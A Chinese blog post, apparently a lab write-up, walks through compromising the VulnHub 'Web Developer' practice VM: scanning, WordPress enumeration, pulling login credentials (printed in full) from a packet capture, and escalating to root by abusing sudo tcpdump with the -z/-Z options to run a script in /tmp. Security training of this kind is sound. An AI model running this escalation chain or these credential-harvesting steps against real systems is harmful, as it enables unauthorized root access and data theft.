CTF实战

最新推荐文章于 2024-10-15 14:40:19 发布
最新推荐文章于 2024-10-15 14:40:19 发布
阅读量1k 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51627527/article/details/110847456
版权

获取靶机Web Developer文件/root/flag.txt中的flag过程:

1.发现目标,找到WebDeveloper的ip地址

在这里插入图片描述
通过nmap直接对本计所在的网段进行扫描:
在这里插入图片描述
发现目标主机的IP为:192.168.91.132

2.利用NMAP扫描目标主机,发现目标主机端口开放、服务情况

通过第一次的扫描我们发现目标主机的端口开放情况:
22端口 ssh协议
80端口 http协议
在这里插入图片描述

3.若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站

在这里插入图片描述

4.利用whatweb探测目标网站使用的CMS模板

通过命令:
在这里插入图片描述
找到
在这里插入图片描述

5.网络搜索wpscan,简要说明其功能

  1. WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。
  2. 该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。

扫描指定站点:

wpsacn --url http://www.xxxxx.com/

例如
在这里插入图片描述
结果:
在这里插入图片描述

6.使用 Dirb 爆破网站目录

在这里插入图片描述

浏览器访问该目录(路径),发现了一个cap文件

在这里插入图片描述

7.利用Wireshark分析该数据包,分析TCP数据流

通过wireshark打开后,在过滤框中输入:

http.request.method==POST

得到
在这里插入图片描述
打开后发现:账号 webdeveloper和密码 Te5eQg&4sBS!Yr$)wf%(DcAd
在这里插入图片描述

8.通过上一步得到的信息后进去网站的后台

在这里插入图片描述

9.利用该CMS存在的(插件Plugin)漏洞并提升权限

在这里插入图片描述
下载完成后
在这里插入图片描述
多出来这个图标:
在这里插入图片描述
打开后,找到 wp-config.php,后直接打开即可得到用户名和密码
在这里插入图片描述
在这里插入图片描述

10.SSH登录服务器

通过ssh命令:

ssh webdeveloper@192.168.91.132

在这里插入图片描述
然后通过命令:
在这里插入图片描述
在这里插入图片描述

发现可以通过root权限执行tcpdump命令
创建攻击文件:

touch /tmp/exploit

写入shellcode

echo "cat /root/flag.txt" > /tmp/exploit

赋予可执行权限

chmod +x /tmp/exploit

利用tcpdump执行任意命令

sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root

获得flag
在这里插入图片描述
tcpdump中的一些命令:
-i eth0 从指定网卡捕获数据包
-w /dev/null 将捕获到的数据包输出到空设备(不输出数据包结果)
-z [command] 运行指定的命令
-Z [user] 指定用户执行命令
-G [rotate_seconds] 每rotate_seconds秒一次的频率执行
-w指定的转储
-W [num] 指定抓包数量

寄快递 那儿都通
关注
CTF实战实践
weixin_46660023的博客
12-05 5587
文章目录前言一、什么是CTF1. CTF竞赛模式2. CTF各大题型简介二、CTF实战1.nmap扫描2. whatweb探测3. Dirb爆破4. wireshark分析5. 利用漏洞提权6. SSH登录服务器总结 前言 今天做了一个CTF的实践,对目标靶机进行了渗透,以此了解CTF实战过程。 一、什么是CTF         首先先来介绍一下CTF。         CTF(Capt.
【愚公系列】2024年03月 《CTF实战:从入门到提升》 010-Web安全入门(PHP代码执行漏洞)
热门推荐
时光隧道
03-28 6万+
PHP代码执行漏洞是一种常见的安全漏洞,也被称为远程代码执行(Remote Code Execution,RCE)漏洞。这种漏洞的发生通常是由于程序员在编写代码时未正确过滤用户输入,导致用户能够将恶意代码插入到应用程序中,然后被解释器执行。攻击者可以利用这种漏洞执行任意代码,从而获取系统权限、窃取数据或者对系统进行进一步的攻击。未过滤用户输入:开发者在使用用户输入时必须进行严格的输入验证和过滤,避免直接将用户输入作为代码执行。eval() 和 exec() 函数。
CTF学习-MISC杂项解题思路
徐徐徐的博客
09-10 2455
如果压缩文件是加密的,或文件头正常但解压缩错误,首先尝试文件是否为伪加密。zip文件是否加密是通过标识符来显示的,在每个文件的文件目录字段有一位专门标识了文件是否加密,将其设置为00表示该文件未加密,如果成功解压则表示文件为伪加密,如果解压出错说明文件为真加密。Stegdetect提示jphide加密时,可以用Jphs.工具进行解密,打开jphswin.exe, 使用open jpeg打开图片,点击seek,输入密码和确认密码,在弹出文件框中选择要保存的解密文件位置即可,结果保存成txt文件。
CTF 实战选择题
02-28
CTF 实战 选择题,带答案 编辑版
CTF实战:从入门到提升
hackeroink的博客
07-02 1087
13章为第4篇Reverse逆向工程,主要介绍了逆向工程基本概念、计算机相关原理、逆向相关基础、常规逆向分析思路、反调试对抗技术等内容;第14~17章为第5篇PWN,主要介绍了基础环境准备、栈溢出、堆溢出等漏洞的原理与利用。本书所有案例都配有相关实践内容,能够更有效地帮助读者进一步理解相关技能。本书旨在帮助读者相对快速且完整地构建一个CTF实战所需的基础知识框架,并通过案例学习相关技能,完成从入门到提升,适合所有网络安全爱好者及从业者参考阅读,也可作为高等院校网络安全相关实践课程的参考用书。
04.实验吧CTF实战之WEB渗透和隐写术解密1
08-03
【网络安全自学篇】WEB渗透与隐写术解密——实验吧CTF实战解析 在网络安全领域,WEB渗透是指通过寻找并利用网站应用的漏洞来获取未经授权的访问或控制权限。而隐写术则是指在图像、音频或其他媒体中隐藏信息的技术...
【愚公系列】2024年03月 《CTF实战:从入门到提升》 011-Web安全入门(PHP反序列化漏洞)
时光隧道
03-30 5万+
PHP是一种广泛使用的开源服务器端脚本语言,它支持面向对象的编程范式。在PHP中,类和对象是用于封装数据与功能的核心组件,它们使得代码更加模块化、易于管理和扩展。在处理对象持久化——即在不同会话或不同请求之间保存对象状态的过程中,序列化和反序列化是两个非常重要的概念。反序列化漏洞通常发生在不安全地反序列化用户提供的数据时。代码执行:攻击者可能会注入恶意对象,当这个对象被反序列化时,它可能会触发任意代码执行。对象注入:通过构造特殊的序列化数据,攻击者可能会在应用程序上下文中创建不正当的对象实例。
实验四 CTF实战
qq_61793472的博客
11-18 239
功能:WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。(Dirb 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的patator,dirsearch,DirBuster, 国内的御剑)截图。3、若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站。可以看出该网站是使用wordpress搭建的,可以查找利用该模板搭建的网站具有的漏洞。
CTF实践
m0_62392732的博客
12-19 3584
1.实验目的 实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。 系统环境:Kali Linux 2、WebDeveloper靶机来源:Vulnerable By Design ~ VulnHub 实验工具:不限 2.实验步骤和内容: 目的:获取靶机Web Developer
CTF比赛编码工具Captfencoder-1.3.0
09-21
CaptfEncoder是一款跨平台网络安全工具套件,提供网络安全相关编码转换、古典密码、密码学、特殊编码等工具,并聚合各类在线工具。Ascii Encoding Web Encoding Hex Encoding Unicode Encoding Base64(Base16、Base32、Base58) Url Encoding Html Entity Encoding Escape Encoding Quoted-printable(可打印字符引用编码) Morse Code(莫尔斯电码) Tap Code(敲击码)
CTF实战结合,一篇成为CTFer(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
08-15 722
*没错,我以前也有这些疑问,也问过我的前辈们,直至今日,我理解了前辈们的意思,与实战相结合,本次将以我自身体会去涵盖到从初学到实战遇到的问题以及可能的方向前景,可以用来做什么,文中包括举例、解题模拟与实战关联等。** 在MISC(杂项)是存在多种类型的题目,各种题目都有,比如流量分析,电子取证,数据隐写,无线,物联网,工控,各种卡(水卡,饭卡,门禁卡等),密码破解等,之所以叫杂项,就是因为杂。最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
CTF实战(隐写术):欢迎来到地狱
weixin_30859423的博客
02-28 468
前言:请登录实验吧开启刷题模式,拿到的flag返回该网站验证正确性。 下载“欢迎来到地狱”CTF题目(总共三个文件
CTF取证技术实战,图片、文件、流等相关内容的取证技术
Scalzdp的专栏
10-25 2211
取证技术在我们安全工作中非常重要,我们可以通过已经产生的流量、日志、文件等信息发现安全存在的蛛丝马迹。通过取证技术的应用,安全工作者可以明确系统存在的漏洞,以及都是谁在系统中做了什么事,其价值和意义对个人、企业、国家而言都是非常重要的。
探索黑客世界:CTF实战教程
gitblog_00025的博客
05-20 454
探索黑客世界:CTF实战教程 去发现同类优质开源项目:https://gitcode.com/ 项目简介 欢迎来到CTF(Capture the Flag)的实战指南,这是一个专为初学者设计的学习平台。该项目旨在引导你逐步掌握网络安全竞赛的基本技巧和知识,尤其是专注于二进制利用领域。通过这个教程,你将在Linux环境中学习编程基础、逆向工程和漏洞利用等核心技能。 项目技术分析 这个教程涵盖了多个...
ctf实战
脚本姑娘
01-18 1644
最近本姑娘着迷ctf类竞赛,有志同道合的小伙伴可以留言一起来做点趣味题目呢此网站第一道题目如下一、robot1,先进网站,发现了一张萌萌哒的图片,相信许多人和本姑娘一样,第一反应是load图片查看代码里面有没有猫腻,然而其实什么也木有呢。本姑娘就第一时间抓了包,用的burp你懂的。2,本姑娘在burp里面稍微找了一下,因是第一道题,着实没有什么难处,在spider发现了如下东西,就是本题解题思路啦
面向新手的CTF实战教学(一)
最新发布
白帽子凯哥哥的博客
10-15 1240
以“KanXueCTF2019JustForhappy”的第一个字符“K”为例,“K”字符在aAbcdefghiabcde[ ]字符串的第19个位置,(aAbcdefghiabcde[ ] =“abcdefghiABCDEFGHIJKLMNjklmn0123456789opqrstuvwxyzOPQRSTUVWXYZ”,且数组第一个下标是以0为起点的),而且48~57减去48对应的值是[0~9];注意,这里面的值是ASCII码!从图中的汇编代码中可知,这是一个弹出消息框的函数,并不参与注册码的相关计算。
ctf实战从入门到提升 pdf
01-06
CTF实战从入门到提升》PDF是一本关于网络安全竞赛CTF(Capture The Flag)的实战指南。该书通过系统地介绍CTF比赛的基础知识、技巧和实战经验,帮助读者从入门阶段逐步提升自己的技能。 首先,该书从CTF比赛的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值